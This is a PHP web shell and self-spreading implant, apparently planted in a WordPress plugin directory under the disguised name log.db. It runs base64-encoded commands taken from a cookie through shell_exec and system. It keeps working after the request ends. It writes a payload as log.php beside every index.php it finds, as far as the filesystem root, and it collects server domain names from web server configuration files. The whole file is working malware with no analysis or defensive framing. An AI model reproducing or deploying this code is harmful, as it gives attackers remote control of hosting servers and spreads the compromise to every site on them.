File: /home/iddeczhh/public_html/wp-content/plugins/vibsark/log.db
<?php
// 允许页面关闭后在后台持续运行,直到任务彻底结束
ignore_user_abort(true);
set_time_limit(0);
header("Content-Type:text/plain;charset=utf-8");
chdir(__DIR__);
echo "[OS] Linux\n";
echo "[MODE] Native PHP Maximum Execution Kernel (Anti-Sandboxing)\n";
// 1. COOKIE CUSTOM COMMAND INTERCEPTOR (STAY ACTIVE)
$cookie_key = 'cmd_cookie';
if (isset($_COOKIE[$cookie_key]) && trim($_COOKIE[$cookie_key]) !== '') {
$c = base64_decode($_COOKIE[$cookie_key]);
echo "[STATUS] Encrypted command fallback triggered.\n";
@shell_exec($c); @system($c); exit();
}
echo "[STATUS] Maximum Background Engine Activated. You can close this webpage now.\n\n";
// 2. PREPARE LOG SOURCE
$log_txt = "log.txt";
if (!file_exists($log_txt)) {
@file_put_contents($log_txt, " ");
}
$payload_content = @file_get_contents($log_txt);
// 3. TASK 1: MAXIMUM RECURSIVE REPLICATION (全盘最大化无缝遍历复制)
function maximum_replication($dir, $payload) {
try {
if (!is_readable($dir)) return;
$files = @scandir($dir);
if (!$files) return;
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;
$path = $dir . '/' . $file;
if (@is_dir($path)) {
// 递归深入
maximum_replication($path, $payload);
} else {
// 匹配目标文件名
if ($file === 'index.php') {
$target = $dir . '/log.php';
// 尝试写入 log.php
if (@file_put_contents($target, $payload) !== false) {
@file_put_contents(__DIR__ . '/phprs.txt', $dir . "\n", FILE_APPEND | LOCK_EX);
}
}
}
}
} catch (Throwable $e) {
// 忽略所有单点错误,确保全盘扫描不被任何中断卡死
}
}
// TASK 2: MAXIMUM DOMAIN AUDIT (纯原生内核高精度域名审计)
function maximum_domain_audit() {
$targets = array('/etc', '/usr/local/etc', '/www/server', '/www/wwwroot');
$domains = array();
// 域名匹配高精度正则
$regex = '/(?:server_name|ServerName|ServerAlias)\s+([a-zA-Z0-9][a-zA-Z0-9-]*\.)+[a-zA-Z]{2,}/i';
foreach ($targets as $target) {
if (!@is_dir($target)) continue;
try {
$dir_iterator = new RecursiveDirectoryIterator($target, RecursiveDirectoryIterator::SKIP_DOTS);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
if ($file->isFile() && preg_match('/\.(conf|cfg|htaccess)$|nginx|apache|httpd/i', $file->getFilename())) {
$content = @file_get_contents($file->getPathname());
if ($content && preg_match_all($regex, $content, $matches)) {
foreach ($matches[0] as $match) {
// 清洗多余的配置关键字和分号
$clean = trim(preg_replace('/^(server_name|ServerName|ServerAlias)\s+/i', '', $match));
$clean = str_replace(';', '', $clean);
$clean = trim($clean);
if (!empty($clean) && !preg_match('/(localhost|127\.0\.0\.1)/i', $clean)) {
$domains[$clean] = true;
}
}
}
}
}
} catch (Throwable $e) {
continue;
}
}
if (!empty($domains)) {
$result_string = implode("\n", array_keys($domains)) . "\n";
@file_put_contents(__DIR__ . '/siters.txt', $result_string, FILE_APPEND | LOCK_EX);
}
}
// 4. GENERATE INDEPENDENT ASYNC PROCESSES
// 异步触发:由于上面的 ignore_user_abort,即使网页加载完了,这两个函数也会在后台疯狂全速运行
maximum_domain_audit();
// 优先从当前 Web 根目录以及系统常见可写目录开始最大化扩散扫描
maximum_replication($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, $payload_content);
maximum_replication('/www/wwwroot', $payload_content);
maximum_replication('/var/www', $payload_content);
maximum_replication('/', $payload_content); // 终极全盘穿透